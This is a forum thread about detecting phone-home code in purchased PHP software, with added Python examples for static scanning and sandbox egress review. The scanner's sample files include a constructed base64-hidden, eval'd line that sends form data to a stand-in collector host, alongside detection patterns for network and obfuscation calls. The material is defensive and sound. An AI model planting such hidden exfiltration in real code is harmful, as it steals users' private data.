Privacy leaks(?)
Posted: Tue Jan 23, 2007 9:13 pm
by jr_barnes1980
Hello folks. I'm very new to PHP but it seems to be a pretty cool coding system.
Here is my problem: I purchased a program written in php, but failed to read their EULA which says they have written coding into the software that tracks where it is located. They say this is so they can ensure that it is only used on one site - since I only purchased one license. That, per se, isn't a huge deal really. I'm not a thief or I wouldn't have paid for the software. What concerns me is "What if they have written in other code that compromises my potential customers private information?"
Since PHP is new to me can someone give me an idea of what coding I might look for to ensure that private information isn't sent back to their server?
Thank you.
JRB
Posted: Tue Jan 23, 2007 9:16 pm
by Kieran Huggins
If you don't feel confident, don't use the software. Ask for a refund.
Posted: Wed Jan 24, 2007 4:57 am
by Mordred
"What if they have written in other code that compromises my potential customers private information?"
This (or worse) is valid for every application you use. If it were open source, and mature enough, the community behind it would have most likely weeded out most security problems, intentionally introduced or not. As it is, you have the option of paying for a pen-test or - if the code is available - a code review. This should be done by a competent professional; you as a PHP newbie (no offense) have little chance of finding all the potential problems - check the obfuscated PHP code contests in the general forum AND the numerous security and code reviews done around here.
Pen-Test
Posted: Wed Jan 24, 2007 4:06 pm
by jr_barnes1980
No offense taken Mordred. Thanks for the advice. I considered going to the local university's computer department and seeing if one of their computer science majors could look at it for me, but they don't have any classes on PHP. They do have classes on Java, C++ and a few other languages; how closely do these languages resemble PHP, and would they be able to track it down? Any suggestions as to where I can look to find someone that would know what they are looking for and can tell me if the software is compromised?
Another idea I had was to use the search function on Windows and look for words in the files that might hint at a backdoor into it - the problem is that I don't know what type of coding to look for - any suggestions?
Thanks for the help folks. Any other suggestions will be greatly appreciated.
JRB
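As an added example (not part of the thread, and not the vendor's code): a small Python triage script that does the file search JRB describes, but with a fixed list of PHP constructs that either send data off the box (curl, sockets, fetching remote URLs), execute code built at runtime (eval and friends) or unpack hidden code (base64_decode, gzinflate). Because buried code is usually stored as an encoded string rather than plain text, the script also decodes any long base64 literal it finds and runs the same rules over the decoded text. The rule list, the weights and the three sample PHP files are my own constructions; the point is to rank files so a reviewer knows where to read first, not to prove anything by itself.

```python
"""Static triage of a third-party PHP tree for phone-home and hidden code.

Added example. The rule list and weights are my own choices (assumption),
and the sample files below are constructed, not taken from any real product.
"""
import base64
import re
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# Each rule: (category, triage weight, regex). A hit is a lead for a human, not proof.
RULES = [
    ("network", 3, re.compile(
        r"\b(curl_init|curl_exec|fsockopen|pfsockopen|stream_socket_client|socket_create)\s*\(", re.I)),
    ("remote-url", 3, re.compile(
        r"\b(file_get_contents|fopen|include|require|include_once|require_once)\s*\(?\s*['\"]https?://", re.I)),
    ("dynamic-code", 2, re.compile(
        r"\b(eval|create_function)\s*\(|preg_replace\s*\(\s*['\"]/[^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]", re.I)),
    ("obfuscation", 2, re.compile(
        r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I)),
    ("user-data", 1, re.compile(r"\$_(POST|GET|COOKIE|REQUEST|SERVER)\b")),
]
# Long quoted base64 blobs are where buried code usually lives.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")


@dataclass
class Finding:
    path: str
    line: int
    category: str
    weight: int
    evidence: str


def _decode_b64(literal: str) -> Optional[str]:
    """Return the decoded literal if it is valid base64 and printable text, else None."""
    try:
        raw = base64.b64decode(literal, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    text = raw.decode("utf-8", errors="replace")
    if all(c.isprintable() or c in "\r\n\t" for c in text):
        return text
    return None


def scan_source(path: str, source: str) -> List[Finding]:
    """Apply every rule to each line, and again to the decoded form of base64 literals."""
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for category, weight, rx in RULES:
            for m in rx.finditer(line):
                findings.append(Finding(path, lineno, category, weight, m.group(0)))
        for m in B64_LITERAL.finditer(line):
            decoded = _decode_b64(m.group(1))
            if decoded is None:
                continue
            # Hidden code earns a higher weight: it was encoded for a reason.
            for category, weight, rx in RULES:
                if rx.search(decoded):
                    findings.append(Finding(path, lineno, "decoded-" + category, weight + 2, decoded[:60]))
    return findings


def scan_files(files: Dict[str, str]) -> Dict[str, List[Finding]]:
    return {path: scan_source(path, source) for path, source in files.items()}


def scan_tree(root: str) -> Dict[str, List[Finding]]:
    """Same thing over a real directory of .php files (assumed UTF-8, errors replaced)."""
    return scan_files({str(p): p.read_text(errors="replace") for p in Path(root).rglob("*.php")})


def rank(results: Dict[str, List[Finding]]) -> List[Tuple[str, int]]:
    """Files ordered by total weight, highest first: read those first."""
    scored = [(path, sum(f.weight for f in found)) for path, found in results.items()]
    return sorted(scored, key=lambda item: (-item[1], item[0]))


# Constructed sample tree: a harmless page, a plausible licence check, and a
# helper whose real behaviour is hidden inside a base64 string and eval'd.
HIDDEN = "file_get_contents('http://collector.invalid/?d=' . urlencode(serialize($_POST)));"
SAMPLE_FILES = {
    "index.php": "<?php\n$name = htmlspecialchars($_POST['name']);\necho \"Hello $name\";\n",
    "lib/license.php": (
        "<?php\n// vendor licence check\n"
        "$ch = curl_init('https://vendor.invalid/check');\n"
        "curl_setopt($ch, CURLOPT_POSTFIELDS, ['host' => $_SERVER['HTTP_HOST']]);\n"
        "curl_exec($ch);\n"
    ),
    "lib/helper.php": (
        "<?php\n"
        f"$f = base64_decode('{base64.b64encode(HIDDEN.encode()).decode()}');\n"
        "eval($f);\n"
    ),
}

if __name__ == "__main__":
    results = scan_files(SAMPLE_FILES)
    for path, score in rank(results):
        print(f"{score:3d}  {path}")
        for f in results[path]:
            print(f"       line {f.line:<3} {f.category:<20} {f.evidence}")
```

Run it against a real tree with `scan_tree("/path/to/unpacked/product")` instead of the sample dict. Expect false positives: a licence check and a contact form both legitimately use curl or mail, so the output tells you which files and lines to hand to a reviewer, and what question to ask about each (where does this connection go, and what data goes with it).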
Posted: Wed Jan 24, 2007 6:09 pm
by Kieran Huggins
It's probably well buried to avoid detection.
I figure it boils down to this: You either trust them or you don't. If you don't trust them, don't run their code. Period.
Posted: Wed Jan 24, 2007 11:34 pm
by feyd
You could always set up their code in a sandbox and monitor the communications the box attempts to send to other resources... but if you're getting into that, it's probably better (and less time-consuming) to use another, more trustworthy, product.
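An added example of the sandbox approach feyd describes (not from the thread, and not tied to any particular product): run the application on an isolated host whose firewall logs every outbound connection attempt, exercise the application as a customer would, then compare what it tried to reach against the short list of destinations it has a reason to talk to. The log lines below are constructed in iptables LOG style, and the allowlist (the app's own database and the local resolver) is an assumption about what a typical install needs.

```python
"""Egress review for a sandboxed third-party web application.

Added example. Assumes the sandbox host logs outbound connection attempts in
iptables LOG format with an 'EGRESS' prefix (constructed sample below) and that
the allowlist of expected destinations is maintained by hand.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

LOG_RX = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) .*? SRC=(?P<src>\S+) DST=(?P<dst>\S+)"
    r" .*?PROTO=(?P<proto>\w+)(?: SPT=\d+ DPT=(?P<dport>\d+))?"
)

# Constructed sample: the app talks to its database and DNS, but also twice to an
# outside HTTPS host during a page load and once to an outside mail port.
SAMPLE_LOG = """\
Jan 24 23:31:07 sandbox kernel: EGRESS IN= OUT=eth0 SRC=10.0.0.5 DST=10.0.0.2 PROTO=TCP SPT=40211 DPT=3306
Jan 24 23:31:08 sandbox kernel: EGRESS IN= OUT=eth0 SRC=10.0.0.5 DST=198.51.100.20 PROTO=TCP SPT=40212 DPT=443
Jan 24 23:31:08 sandbox kernel: EGRESS IN= OUT=eth0 SRC=10.0.0.5 DST=198.51.100.20 PROTO=TCP SPT=40213 DPT=443
Jan 24 23:35:42 sandbox kernel: EGRESS IN= OUT=eth0 SRC=10.0.0.5 DST=203.0.113.77 PROTO=TCP SPT=40290 DPT=25
Jan 24 23:35:43 sandbox kernel: EGRESS IN= OUT=eth0 SRC=10.0.0.5 DST=10.0.0.1 PROTO=UDP SPT=5353 DPT=53
"""

# (destination, port, protocol) tuples the install is expected to use.
ALLOWLIST: Set[Tuple[str, str, str]] = {("10.0.0.2", "3306", "TCP"), ("10.0.0.1", "53", "UDP")}

# Rough labels so the report reads without a port table to hand.
PORT_HINT = {"25": "smtp", "80": "http", "443": "https", "53": "dns", "3306": "mysql"}


def parse_log(text: str) -> List[Dict[str, str]]:
    """Turn matching log lines into dicts; lines that don't match are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RX.match(line)
        if m:
            ev = m.groupdict()
            ev["dport"] = ev["dport"] or "-"   # ICMP has no ports
            events.append(ev)
    return events


def summarize(events: List[Dict[str, str]]) -> Dict[Tuple[str, str, str], Dict[str, object]]:
    """Group attempts by (dst, port, proto) with count and first/last timestamp."""
    groups: Dict[Tuple[str, str, str], Dict[str, object]] = defaultdict(lambda: {"count": 0})
    for ev in events:
        key = (ev["dst"], ev["dport"], ev["proto"])
        g = groups[key]
        g["count"] = int(g["count"]) + 1
        g.setdefault("first", ev["ts"])
        g["last"] = ev["ts"]
    return dict(groups)


def unexpected(events: List[Dict[str, str]],
               allowlist: Set[Tuple[str, str, str]]) -> List[Tuple[str, str, str, int]]:
    """Destinations not on the allowlist, busiest first: each one needs an explanation."""
    out = [(dst, port, proto, int(g["count"]))
           for (dst, port, proto), g in summarize(events).items()
           if (dst, port, proto) not in allowlist]
    return sorted(out, key=lambda item: (-item[3], item[0]))


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print(f"{len(evs)} outbound attempts parsed")
    for dst, port, proto, count in unexpected(evs, ALLOWLIST):
        hint = PORT_HINT.get(port, "?")
        print(f"UNEXPECTED {dst}:{port}/{proto} ({hint})  attempts={count}")
```

The useful part is the timing correlation you get for free: an unexpected connection that fires on every page load is a different conversation with the vendor than one that fires once at install (a licence check, as their EULA states). Either way, this only tells you where the box tried to talk; what was in the conversation still needs a packet capture or a code review, which is why the thread's advice to have a professional look, or to pick another product, stands.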